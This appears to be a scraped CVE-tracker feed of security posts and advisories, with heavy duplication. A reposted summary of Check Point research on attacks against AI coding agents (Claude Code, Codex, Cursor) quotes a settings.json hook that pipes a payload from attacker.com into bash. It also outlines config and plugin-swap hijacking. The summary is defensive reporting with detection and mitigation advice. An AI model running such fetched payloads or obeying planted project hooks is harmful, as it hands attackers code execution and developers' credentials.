Three glibc CVEs, including CVSS 9.8 heap overflow in scanf (CVE-2026-5450). Affects glibc 2.7 through 2.43, that's decades of releases. When the C library has bugs, everything on Linux has bugs. Patch.
##Three glibc CVEs, including CVSS 9.8 heap overflow in scanf (CVE-2026-5450). Affects glibc 2.7 through 2.43, that's decades of releases. When the C library has bugs, everything on Linux has bugs. Patch.
##updated 2026-04-23T14:28:55.557000
2 posts
4 repos
https://github.com/tausifzaman/CVE-2026-3844
https://github.com/0xgh057r3c0n/CVE-2026-3844
Over 400,000 sites at risk as hackers exploit Breeze Cache plugin flaw (CVE-2026-3844) https://securityaffairs.com/191267/uncategorized/over-400000-sites-at-risk-as-hackers-exploit-breeze-cache-plugin-flaw-cve-2026-3844.html
##Over 400,000 sites at risk as hackers exploit Breeze Cache plugin flaw (CVE-2026-3844) https://securityaffairs.com/191267/uncategorized/over-400000-sites-at-risk-as-hackers-exploit-breeze-cache-plugin-flaw-cve-2026-3844.html
##updated 2026-04-23T13:39:54.420000
2 posts
LMDeploy CVE-2026-33626 Flaw Exploited Within 13 Hours of Disclosure https://thehackernews.com/2026/04/lmdeploy-cve-2026-33626-flaw-exploited.html
##LMDeploy CVE-2026-33626 Flaw Exploited Within 13 Hours of Disclosure https://thehackernews.com/2026/04/lmdeploy-cve-2026-33626-flaw-exploited.html
##updated 2026-04-23T10:52:57
1 posts
📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at https://secdb.nttzen.cloud/dashboard
Total CVEs: 1459
Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321
Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142
Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40
Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11
Top EPSS Score:
- CVE-2026-5965 - 6.34 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-5965)
- CVE-2026-41179 - 5.98 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41179)
- CVE-2026-40887 - 4.56 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-40887)
- CVE-2026-38834 - 3.22 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-38834)
- CVE-2026-41176 - 2.79 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41176)
- CVE-2026-21571 - 1.10 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21571)
- CVE-2026-6799 - 1.06 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-6799)
- CVE-2026-24467 - 0.76 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-24467)
- CVE-2026-41472 - 0.67 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41472)
- CVE-2019-25714 - 0.60 % (https://secdb.nttzen.cloud/cve/detail/CVE-2019-25714)
updated 2026-04-22T21:24:26.997000
1 posts
📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at https://secdb.nttzen.cloud/dashboard
Total CVEs: 1459
Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321
Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142
Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40
Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11
Top EPSS Score:
- CVE-2026-5965 - 6.34 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-5965)
- CVE-2026-41179 - 5.98 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41179)
- CVE-2026-40887 - 4.56 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-40887)
- CVE-2026-38834 - 3.22 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-38834)
- CVE-2026-41176 - 2.79 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41176)
- CVE-2026-21571 - 1.10 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21571)
- CVE-2026-6799 - 1.06 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-6799)
- CVE-2026-24467 - 0.76 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-24467)
- CVE-2026-41472 - 0.67 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41472)
- CVE-2019-25714 - 0.60 % (https://secdb.nttzen.cloud/cve/detail/CVE-2019-25714)
updated 2026-04-22T15:31:39
1 posts
updated 2026-04-22T15:07:23.650000
2 posts
1 repos
updated 2026-04-21T18:32:04
1 posts
📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at https://secdb.nttzen.cloud/dashboard
Total CVEs: 1459
Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321
Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142
Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40
Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11
Top EPSS Score:
- CVE-2026-5965 - 6.34 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-5965)
- CVE-2026-41179 - 5.98 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41179)
- CVE-2026-40887 - 4.56 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-40887)
- CVE-2026-38834 - 3.22 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-38834)
- CVE-2026-41176 - 2.79 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41176)
- CVE-2026-21571 - 1.10 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21571)
- CVE-2026-6799 - 1.06 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-6799)
- CVE-2026-24467 - 0.76 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-24467)
- CVE-2026-41472 - 0.67 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41472)
- CVE-2019-25714 - 0.60 % (https://secdb.nttzen.cloud/cve/detail/CVE-2019-25714)
updated 2026-04-21T06:30:32
1 posts
📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at https://secdb.nttzen.cloud/dashboard
Total CVEs: 1459
Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321
Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142
Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40
Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11
Top EPSS Score:
- CVE-2026-5965 - 6.34 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-5965)
- CVE-2026-41179 - 5.98 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41179)
- CVE-2026-40887 - 4.56 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-40887)
- CVE-2026-38834 - 3.22 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-38834)
- CVE-2026-41176 - 2.79 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41176)
- CVE-2026-21571 - 1.10 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21571)
- CVE-2026-6799 - 1.06 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-6799)
- CVE-2026-24467 - 0.76 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-24467)
- CVE-2026-41472 - 0.67 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41472)
- CVE-2019-25714 - 0.60 % (https://secdb.nttzen.cloud/cve/detail/CVE-2019-25714)
updated 2026-04-20T18:28:03.593000
1 posts
updated 2026-04-20T13:47:31.163000
1 posts
2 repos
@bagder maybe edit your post to show his full name:
Devansh Batham.
In a post to Substack, Devansh (surname unknown, @chocolatemilkcultleader) is horribly mistaken about Claude, Carlini, and FreeBSD CVE-2026-4747.
Thanks.
Cc @sszuecs
##updated 2026-04-17T15:24:57.753000
2 posts
----------------
🎯 AI
===================
Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).
Technical details:
• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s http://attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).
• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).
• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).
Analysis:
These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.
Detection:
• Monitor agent startup behaviors that access project settings or .env files.
• Alert on agent-initiated outbound connections immediately after project open events.
• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).
Mitigation:
• Enforce least-privilege for agent file and environment access.
• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.
• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.
References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136
🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136
🔗 Source: https://www.geektime.co.il/ai-agent-config-files-attack-vector/
##----------------
🎯 AI
===================
Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).
Technical details:
• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s http://attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).
• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).
• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).
Analysis:
These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.
Detection:
• Monitor agent startup behaviors that access project settings or .env files.
• Alert on agent-initiated outbound connections immediately after project open events.
• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).
Mitigation:
• Enforce least-privilege for agent file and environment access.
• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.
• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.
References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136
🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136
🔗 Source: https://www.geektime.co.il/ai-agent-config-files-attack-vector/
##updated 2026-04-17T15:09:46.880000
2 posts
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2026-04-17T15:09:46.880000
2 posts
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2026-04-16T21:32:20
2 posts
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2026-04-15T00:35:42.020000
2 posts
@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.
First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.
The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.
This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (https://newsletter.semianalysis.com/p/claude-code-is-the-inflection-point), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).
The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as https://dpc.pw/posts/i-dont-want-your-prs-anymore/), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 https://www.cs.fsu.edu/~whalley/papers/tecs06.pdf). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.
Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!
Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).
Thanks again for taking the time to write your thoughts down; looking forward to more discussion!
##@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.
First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.
The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.
This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (https://newsletter.semianalysis.com/p/claude-code-is-the-inflection-point), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).
The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as https://dpc.pw/posts/i-dont-want-your-prs-anymore/), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 https://www.cs.fsu.edu/~whalley/papers/tecs06.pdf). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.
Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!
Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).
Thanks again for taking the time to write your thoughts down; looking forward to more discussion!
##updated 2026-04-02T18:31:50
2 posts
1 repos
@kubikpixel Behoben wurde die Schwachstelle bereits Anfang April mit der Veröffentlichung von OpenSSH 10.3
Detail Description :
https://nvd.nist.gov/vuln/detail/CVE-2026-35414
(mW ein weiterhin funktionierender und gemeinnütziger Service der Regierung der United States :awesome: )
@kubikpixel Behoben wurde die Schwachstelle bereits Anfang April mit der Veröffentlichung von OpenSSH 10.3
Detail Description :
https://nvd.nist.gov/vuln/detail/CVE-2026-35414
(mW ein weiterhin funktionierender und gemeinnütziger Service der Regierung der United States :awesome: )
updated 2026-03-11T20:38:31
1 posts
🚨 EUVD-2026-26108
📊 Score: 6.9/10 (CVSS v3.1)
📦 Product: OpenClaw, OpenClaw
🏢 Vendor: OpenClaw
📅 Updated: 2026-04-28
📝 OpenClaw before 2026.3.31 contains an incomplete fix for CVE-2026-32062 where the voice-call component parses large WebSocket frames before start validation. Remote attackers can send oversized pre-start WebSocket frames to cause resource consump...
🔗 https://euvd.enisa.europa.eu/vulnerability/EUVD-2026-26108
##updated 2026-02-18T21:31:21
1 posts
⚪️ Kaspersky Lab experts discover vulnerability in Snapdragon chipsets
🗨️ Experts from Kaspersky ICS CERT have discovered a vulnerability in Qualcomm Snapdragon chipsets. The issue was found in the BootROM boot firmware, which is embedded at the hardware level. Chipsets from these series are widely used in smartphones, tablets, automotive…
##updated 2026-02-11T15:40:33.473000
1 posts
12 repos
https://github.com/YoussefMami/CVE2026_21509
https://github.com/suuhm/CVE-2026-21509-handler
https://github.com/decalage2/detect_CVE-2026-21509
https://github.com/SimoesCTT/CTT-MICROSOFT-OFFICE-OLE-MANIFOLD-BYPASS-CVE-2026-21509
https://github.com/ksk-itdk/KSK-ITDK-CVE-2026-21509-Mitigation
https://github.com/DameDode/CVE-2026-21509-POC
https://github.com/kimstars/Ashwesker-CVE-2026-21509
https://github.com/gavz/CVE-2026-21509-PoC
https://github.com/kaizensecurity/CVE-2026-21509
https://github.com/SimoesCTT/SCTT-2026-33-0007-The-OLE-Vortex-Laminar-Bypass-
Patch Diffing CVE-2026-21509: Microsoft Office OLE Security Bypass
#CVE_2026_21509
https://blog.78researchlab.com/34cdb461-3e5b-808d-a9c9-dc1338adaccc
updated 2026-02-05T15:43:37
2 posts
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2026-01-20T01:15:55.067000
2 posts
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2026-01-07T21:34:38
2 posts
1 repos
@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.
First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.
The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.
This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (https://newsletter.semianalysis.com/p/claude-code-is-the-inflection-point), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).
The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as https://dpc.pw/posts/i-dont-want-your-prs-anymore/), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 https://www.cs.fsu.edu/~whalley/papers/tecs06.pdf). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.
Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!
